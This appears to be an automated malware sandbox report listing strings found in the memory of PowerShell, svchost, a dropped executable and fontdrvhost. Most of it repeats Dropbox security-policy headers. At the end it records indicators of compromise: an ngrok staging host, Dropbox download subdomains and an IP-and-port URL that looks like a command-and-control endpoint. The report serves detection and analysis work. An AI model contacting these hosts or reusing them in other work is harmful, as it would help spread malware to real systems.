https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; media-src https://* blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: media-src https://* blob: ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; font-src https://* data: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; media-src https://* blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: om/csp_log?policy_name=metaserver-whitelist ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; frame-ancestors 'self' https://*.dropbox.com ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; media-src https://* blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: om/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; frame-ancestors 'self' https://*.dropbox.com ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; media-src https://* blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; font-src https://* data: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                      Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                      Source: global trafficDNS traffic detected: DNS query: uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                      Source: global trafficDNS traffic detected: DNS query: uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: global trafficDNS traffic detected: DNS query: uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Content-Length: 96Content-Type: text/html; charset=utf-8Date: Tue, 10 Dec 2024 17:41:53 GMTServer: Werkzeug/3.0.3 Python/3.12.8Connection: close
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356807000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                      Source: powershell.exe, 00000002.00000002.2094822696.0000012D32683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                      Source: svchost.exe, 00000006.00000002.3022485486.000001BA25800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: powershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335567C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                      Source: 854113748.exe, 0000001A.00000000.2141718264.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371490999.0000000002420000.00000004.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.glarysoft.com/goto.php?a=upgradetopro&s=DiskDefrag340100134010023401003340100434010053401
                      Source: powershell.exe, 00000010.00000002.2195811117.00000233539C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coS
                      Source: fontdrvhost.exeString found in binary or memory: https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65ge
                      Source: fontdrvhost.exe, 0000001E.00000003.2468942402.0000000005945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65gekernelbasentdllkernel32GetProces
                      Source: fontdrvhost.exe, 0000001E.00000002.2470234672.0000000002FFC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65gex
